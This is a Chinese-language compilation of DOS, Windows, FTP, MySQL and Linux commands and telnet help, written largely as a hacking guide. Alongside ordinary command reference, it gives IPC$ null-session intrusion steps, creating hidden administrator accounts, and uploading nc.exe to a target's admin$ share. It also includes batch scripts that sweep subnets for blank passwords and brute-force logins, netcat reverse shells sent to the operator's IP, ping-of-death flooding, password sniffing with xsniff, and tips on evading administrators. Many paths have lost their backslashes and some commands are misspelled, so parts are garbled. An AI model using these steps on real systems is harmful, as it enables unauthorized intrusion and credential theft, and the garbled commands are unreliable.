dos命令大全telnet_dos命令大全

Ⅰ 尋DOS命令大全

DOS命令大全：

CMD命令
net use ipipc$ " " /user:" " 建立IPC空鏈接
net use ipipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: ipc$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: ipc$ 登陸後映射對方C：到本地為H:
net use ipipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名查看帳戶的屬性
net localgroup administrators 用戶名 /add 把"用戶"添加到管理員中使其具有管理員許可權,注意：
administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名開啟服務；(如:net start telnet， net start schele)
net stop 服務名停止某服務
net time 目標ip 查看對方時間
net time 目標ip /set 設置本地計算機時間與"目標IP"主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數："-w數字"用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數："-l[空格]數據包大小"；"-n發送數據次數"；"-t"指一直
ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參
數"/all"顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-
H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如"DEL/AR *.*"表示刪除當前目錄下所有隻讀文件，"DEL/A-
S *.*"表示刪除當前目錄下除系統文件以外的所有文件
二：
del /S /Q 目錄或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統
確認就直接刪除。（二個命令作用相同）
move 盤符路徑要移動的文件名存放移動文件的路徑移動後文件名移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命
令
at id號開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑文件名1 路徑文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:srv.exe ipadmin$ 復制本地c:srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：
2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
ipadmin$svv.exe c: 或:ipadmin$*.* 復制對方admini$共享下的srv.exe文件（所有文
件）至本地C：
x 要復制的文件或目錄樹目標地址目錄名復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸後，將"IP"的
server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式
（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:server.exe 登陸後，上傳本地c:server.exe至主機
ftp ip 埠用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文
本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway
addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的存檔，只讀，系統，隱藏屬性；用＋則是添加為某
屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即"DATE/T"、"TIME/T"將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if 在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如："：start"標簽）
call 路徑批處理文件名從批處理程序中調用另一個批處理程序（更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名查找某文件
title 標題名字更改CMD窗口標題名字
color 顏色值設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡
綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱更改cmd.exe的顯示的命令提示符(把C:、D:統一改為：EntSky )
三：
ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）
format 盤符 /FS:類型格式化磁碟,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md 目錄名創建目錄
replace 源文件要替換文件的目錄替換文件
ren 原文件名新文件名重命名文件名
tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱
type 文件名顯示文本文件的內容
more 文件名逐屏顯示輸出文件
doskey 要鎖定的命令＝字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey
dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告；加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑可執行文件的文件名為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?
regedit /s 注冊表文件名導入注冊表；參數/S指安靜模式導入，無任何提示；
regedit /e 注冊表文件名導出注冊表
cacls 文件名參數顯示或修改文件訪問控制列表（ACL）--針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶
名:perm 替換指定用戶的訪問許可權；/G 用戶名:perm 賦予指定用戶訪問許可權；Perm 可以是: N 無，R 讀取， W 寫入， C 更
改(寫入)，F 完全控制；例：cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。
cacls 文件名查看文件的訪問用戶許可權列表
REM 文本內容在批處理文件中添加註解
netsh 查看或更改本地網路配置情況

四：

IIS服務命令：
iisreset /reboot 重啟win2k計算機（但有提示系統將重啟信息出現）
iisreset /start或stop 啟動（停止）所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機
iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將
會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。
FTP 命令： (後面有詳細說明內容)
ftp的命令行格式為:
ftp －v －d －i －n －g[主機名] －v 顯示遠程伺服器的所有響應信息。
－d 使用調試方式。
－n 限制ftp的自動登錄,即不使用.netrc文件。
－g 取消全局文件名。
help [命令] 或？[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本
地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote－dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell，exit回到ftp環境,如!ls＊.zip

#5 五：

MYSQL 命令：
mysql -h主機地址 -u用戶名－p密碼連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。
（例：mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格，其它也一樣）
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by "密碼"; 增加新用戶。（注意：和上面不同，下
面的因為是MYSQL環境中的命令，所以後面都帶一個分號作為命令結束符）
show databases; 顯示資料庫列表。剛開始時才兩個資料庫：mysql和test。mysql庫很重要它裡面有MYSQL的系統信息，我
們改密碼和新增用戶，實際上就是用這個庫進行操作。
use mysql；
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名；
create table 表名 (欄位設定列表)；建表
drop database 庫名;
drop table 表名；刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqlmp --opt school>school.bbb 備份資料庫：（命令在DOS的mysql in目錄下執行）;注釋:將資料庫
school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。
win2003系統下新增命令（實用部份）：
shutdown /參數關閉或重啟本地或遠程主機。
參數說明：/S 關閉主機，/R 重啟主機， /T 數字設定延時的時間，范圍0～180秒之間， /A取消開機，/M //IP 指定的遠程主
機。
例：shutdown /r /t 0 立即重啟本地主機（無延時）
taskill /參數進程名或進程的pid 終止一個或多個任務和進程。
參數說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，/T 終
止指定的進程及他所啟動的子進程。
tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
參數說明：/M 列出當前進程載入的dll文件，/SVC 顯示出每個進程對應的服務，無參數時就只列出當前的進程。
六：
linux系統下基本命令：要區分大小寫
uname 顯示版本信息（同win2K的 ver）
dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件（同win2K的 dir）
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄，注意cd 與..之間有空格。cd /返回到根目錄。
cat 文件名查看文件內容
cat >abc.txt 往abc.txt文件中寫上內容。
more 文件名以一頁一頁的方式顯示一個文本文件。
cp 復制文件
mv 移動文件
rm 文件名刪除文件，rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名建立目錄
rmdir 刪除子目錄，目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字元串
diff 檔案文件比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機（同win2K），當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器（同win2K）

附：批處理命令與變數

1：for命令及變數基本格式：
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定
一個單一字母可替換的參數，如：%i ，而指定一個變數則用：%%i ，而調用變數時用：%i% ，變數是區分大小寫的（%i 不等於 %I）。
批處理每次能處理的變數從%0-%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2-%9指輸入的
第2-9個值；例：net use ipipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3

(set):指定一個或一組文件，可使用通配符，如：(D:user.txt)和(1 1 254)(1 -1 254),{ "(1 1
254)"第一個"1"指起始值，第二個"1"指增長量，第三個"254"指結束值，即：從1到254；"(1 -1 254)"說明：即從254到
1 }

command：指定對第個文件執行的命令，如：net use命令；如要執行多個命令時，命令這間加：& 來隔開
command_parameters：為特定命令指定參數或命令行開關

IN (set)：指在(set)中取值；DO command ：指執行command

參數：/L 指用增量形式{ (set)為增量形式時 }；/F 指從文件中不斷取值，直到取完為止{ (set)為文件時，如
(d:pass.txt)時 }。
用法舉例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /
user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明：對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接，如果成功就把該IP存
在test.txt中。

/L指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*為批處理默認的 %1；%%G 為變數(ip的最後一位）；& 用來
隔開echo 和net use 這二個命令；| 指建立了ipc$後，在結果中用find查看是否有"命令成功完成"信息；%1.%%G 為完整的
IP地址；(1 1 254) 指起始值，增長量，結止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
存為：ok.exe 說明：輸入一個IP後，用字典文件d:pass.dic來暴解d:user.dic中的用戶密碼，直到文件中值取完為止。%%i為
用戶名；%1為輸入的IP地址（默認）。
七：
2：if命令及變數基本格式：
IF [not] errorlevel 數字命令語句如果程序運行最後返回一個等於或大於指定數字的退出編碼，指定條件為"真"。
例：IF errorlevel 0 命令指程序執行後返回的值為0時，就值行後面的命令；IF not errorlevel 1 命令指程序執行
最後返回的值不等於1，就執行後面的命令。
0 指發現並成功執行（真）；1 指沒有發現、沒執行（假）。
IF [not] 字元串1==字元串2 命令語句如果指定的文本字元串匹配（即：字元串1 等於字元串2），就執行後面的命令。
例："if "%2%"=="4" goto start"指：如果輸入的第二個變數為4時，執行後面的命令（注意：調用變數時就%變數名%並加"
"）
IF [not] exist 文件名命令語句如果指定的文件名存在，就執行後面的命令。
例："if not nc.exe goto end"指：如果沒有發現nc.exe文件就跳到":end"標簽處。
IF [not] errorlevel 數字命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令
語句或 IF [not] exist 文件名命令語句 else 命令語句加上：else 命令語句後指：當前面的條件不成立時，就指行else
後面的命令。注意：else 必須與 if 在同一行才有效。當有del命令時需把del命令全部內容用< >括起來，因為del命令要單獨一行時才
能執行，用上< >後就等於是單獨一行了；例如："if exist test.txt. <del test.txt.> else echo
test.txt.missing "，注意命令中的"."

（二）系統外部命令(均需下載相關工具)：

1、瑞士軍刀：nc.exe

參數說明：
-h 查看幫助信息
-d 後台模式
-e prog程序重定向，一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式，用於入站連接
-L 監聽模式，連接天閉後仍然繼續監聽，直到CTR+C
-n IP地址，不能用域名
-o film記錄16進制的傳輸
-p[空格]埠本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出，用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入，輸出關掉（用於掃錨時）
基本用法：
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的
TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向
連接192.168.0.2的5354埠
高級用法：
nc -L -p 80 作為蜜罐用1：開啟並不停地監聽80埠，直到CTR+C為止
nc -L -p 80 > c:log.txt 作為蜜罐用2：開啟並不停地監聽80埠，直到CTR+C,同時把結果輸出到c:log.txt
nc -L -p 80 < c:honeyport.txt 作為蜜罐用3-1：開啟並不停地監聽80埠，直到CTR+C,並把
c:honeyport.txt中內容送入管道中，亦可起到傳送文件作用
type.exe c:honeyport | nc -L -p 80 作為蜜罐用3-2：開啟並不停地監聽80埠，直到CTR+C,並把
c:honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用：nc -l -p 本機埠
在對方主機上用：nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用：nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用：nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱傳送文件到對方主機
備註：
| 管道命令
< 或 > 重定向命令。"<"，例如：tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
＠表示執行＠後面的命令，但不會顯示出來（後台執行）；例：＠dir c:winnt >> d:log.txt 意思是：後台執行dir，並把結果
存在d:log.txt中

>與>>的區別 ">"指：覆蓋；">>"指：保存到(添加到）。

如：@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二個命令分別執行二次比較看：用>>的則
是把二次的結果都保存了，而用：>則只有一次的結果，是因為第二次的結果把第一次的覆蓋了。

八：

2、掃錨工具：xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型（通過NETBIOS和SNMP協議）
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log 文件名指定掃描報告文件名 (後綴為：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測
192.168.1.1-192.168.255.255網段內主機的所有漏洞，跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測
192.168.1.1-192.168.255.255網段內主機的標准埠狀態，NT弱口令用戶，最大並發線程數量為150，跳過沒有檢測到開放端
口的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測"hostlist.txt"文件中列
出的所有主機的標准埠狀態，CGI漏洞，最大並發線程數量為200，同一時刻最多檢測5台主機，顯示詳細檢測進度，跳過沒有檢測到開放埠的主機

九：

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址過濾IP地址
-port 埠過濾埠
-log 文件名將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以
ASCII格式輸出

4、終端服務密碼破解: tscrack.exe

Ⅱ telnet 命令使用方法詳解，telnet命令怎麼用

1、語法

telnet(選項)(參數)

2、選項

-8：允許使用8位字元資料，包括輸入與輸出；

-a：嘗試自動登入遠端系統；

-b<主機別名>：使用別名指定遠端主機名稱；

-c：不讀取用戶專屬目錄里的.telnetrc文件；

-d：啟動排錯模式；

-e<脫離字元>：設置脫離字元；

-E：濾除脫離字元；

-f：此參數的效果和指定"-F"參數相同；

-F：使用Kerberos V5認證時，加上此參數可把本地主機的認證數據上傳到遠端主機；

-k<域名>：使用Kerberos認證時，加上此參數讓遠端主機採用指定的領域名，而非該主機的域名；

-K：不自動登入遠端主機；

-l<用戶名稱>：指定要登入遠端主機的用戶名稱；

-L：允許輸出8位字元資料；

-n<記錄文件>：指定文件記錄相關信息；

-r：使用類似rlogin指令的用戶界面；

-S<服務類型>：設置telnet連線所需的ip TOS信息；

-x：假設主機有支持數據加密的功能，就使用它；

-X<認證形態>：關閉指定的認證形態。參數遠程主機：指定要登錄進行管理的遠程主機；埠：指定TELNET協議使用的埠號。

3、參數

遠程主機：指定要登錄進行管理的遠程主機；

埠：指定TELNET協議使用的埠號。

(2)dos命令大全telnet擴展閱讀：

實例：域名無法解析

命令：

telnetwww..com

輸出：

[root@localhost~]#telnetwww..com
www..com/telnet:
[root@localhost~]#

說明：

處理這種情況方法：

（1）確認域名是否正確

（2）確認本機的域名解析有關的設置是否正確

（3）確認防火牆是否放開了UDP53埠的訪問

Ⅲ dos下的telnet命令

遠程登錄命令，一般使用23埠，而且需要對方機器開telnet服務。
telnet [-a][-e escape char][-f log file][-l user][-t term][host [port]]
-a 企圖自動登錄。除了用當前已登陸的用戶名以外，與 -l 選項相同。
-e 跳過字元來進入 telnet 客戶提示。
-f 客戶端登錄的文件名
-l 指定遠程系統上登錄用的用戶名稱。
要求遠程系統支持 TELNET ENVIRON 選項。
-t 指定終端類型。
支持的終端類型僅是: vt100, vt52, ansi 和 vtnt。
host 指定要連接的遠程計算機的主機名或 IP 地址。
port 指定埠號或服務名。

Ⅳ DOS中NET，PING,TELNET三個命令詳解

其實你問dos就可以了,你輸入命令,會顯示它的作用和參數選項. ping
它是用來檢查網路是否通暢或者網路連接速度的命令。作為一個生活在網路上的管理員或者黑客來說，ping命令是第一個必須掌握的DOS命令，它所利用的原理是這樣的：網路上的機器都有唯一確定的IP地址，我們給目標IP地址發送一個數據包，對方就要返回一個同樣大小的數據包，根據返回的數據包我們可以確定目標主機的存在，可以初步判斷目標主機的操作系統等。下面就來看看它的一些常用的操作。-t 表示將不間斷向目標IP發送數據包，直到我們強迫其停止。試想，如果你使用100M的寬頻接入，而目標IP是56K的小貓，那麼要不了多久，目標IP就因為承受不了這么多的數據而掉線，呵呵，一次攻擊就這么簡單的實現了。
-l 定義發送數據包的大小，默認為32位元組，我們利用它可以最大定義到65500位元組。結合上面介紹的-t參數一起使用，會有更好的效果哦。
-n 定義向目標IP發送數據包的次數，默認為3次。如果網路速度比較慢，3次對我們來說也浪費了不少時間，因為現在我們的目的僅僅是判斷目標IP是否存在，那麼就定義為一次吧。
說明一下，如果-t 參數和 -n參數一起使用，ping命令就以放在後面的參數為標准，比如「ping IP -t -n 3」，雖然使用了-t參數，但並不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主機域名，這樣就可以得到主機的IP。 net
這個命令是網路命令中最重要的一個，必須透徹掌握它的每一個子命令的用法，因為它的功能實在是太強大了，這簡直就是微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子命令。在DOS中輸入net。在這里，我們重點掌握幾個入侵常用的子命令。
net view
使用此命令查看遠程主機的所以共享資源。命令格式為net view \\IP。
net use
把遠程主機的某個共享資源影射為本地盤符，圖形界面方便使用，呵呵。命令格式為net use x: \\IP\sharename。上面一個表示把192.168.0.5IP的共享名為magic的目錄影射為本地的Z盤。下面表示和192.168.0.7建立IPC$連接（net use \\IP\IPC$ "password" /user:"name"），
建立了IPC$連接後，呵呵，就可以上傳文件了： nc.exe \\192.168.0.7\admin$，表示把本地目錄下的nc.exe傳到遠程主機，結合後面要介紹到的其他DOS命令就可以實現入侵了。
net start
使用它來啟動遠程主機上的服務。當你和遠程主機建立連接後，如果發現它的什麼服務沒有啟動，而你又想利用此服務怎麼辦？就使用這個命令來啟動吧。用法：net start servernamenet stop
入侵後發現遠程主機的某個服務礙手礙腳，怎麼辦？利用這個命令停掉就ok了，用法和net start同。 net user
查看和帳戶有關的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對我們入侵是很有利的，最重要的，它為我們克隆帳戶提供了前提。鍵入不帶參數的net user，可以查看所有用戶，包括已經禁用的。下面分別講解。
1，net user abcd 1234 /add，新建一個用戶名為abcd，密碼為1234的帳戶，默認為user組成員。
2，net user abcd /del，將用戶名為abcd的用戶刪除。
3，net user abcd /active:no，將用戶名為abcd的用戶禁用。
4，net user abcd /active:yes，激活用戶名為abcd的用戶。
5，net user abcd，查看用戶名為abcd的用戶的情況
net localgroup
查看所有和用戶組有關的信息和進行相關操作。鍵入不帶參數的net localgroup即列出當前所有的用戶組。在入侵過程中，我們一般利用它來把某個帳戶提升為administrator組帳戶，這樣我們利用這個帳戶就可以控制整個遠程主機了。用法：net localgroup groupname username /add。
現在我們把剛才新建的用戶abcd加到administrator組里去了，這時候abcd用戶已經是超級管理員了，呵呵，你可以再使用net user abcd來查看他的狀態。但這樣太明顯了，網管一看用戶情況就能漏出破綻，所以這種方法只能對付菜鳥網管，但我們還得知道。現在的手段都是利用其他工具和手段克隆一個讓網管看不出來的超級管理員。有興趣可以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。net time
這個命令可以查看遠程主機當前的時間。如果你的目標只是進入到遠程主機裡面，那麼也許就用不到這個命令了。但簡單的入侵成功了，難道只是看看嗎？我們需要進一步滲透。這就連遠程主機當前的時間都需要知道，因為利用時間和其他手段可以實現某個命令和程序的定時啟動，為我們進一步入侵打好基礎。用法：net time \\IP。 telnet
功能強大的遠程登陸命令，幾乎所有的入侵者都喜歡用它，屢試不爽。為什麼？它操作簡單，如同使用自己的機器一樣，只要你熟悉DOS命令，在成功以administrator身份連接了遠程機器後，就可以用它來干你想乾的一切了。下面介紹一下使用方法，首先鍵入telnet回車，再鍵入help查看其幫助信息。
然後在提示符下鍵入open IP回車，這時就出現了登陸窗口，讓你輸入合法的用戶名和密碼，這里輸入任何密碼都是不顯示的。
當輸入用戶名和密碼都正確後就成功建立了telnet連接，這時候你就在遠程主機上具有了和此用戶一樣的許可權，利用DOS命令就可以實現你想乾的事情了。轉自: http://www.91bjb.com/bbs/thread-68035-1-1.html

Ⅳ dos命令有哪些如何用

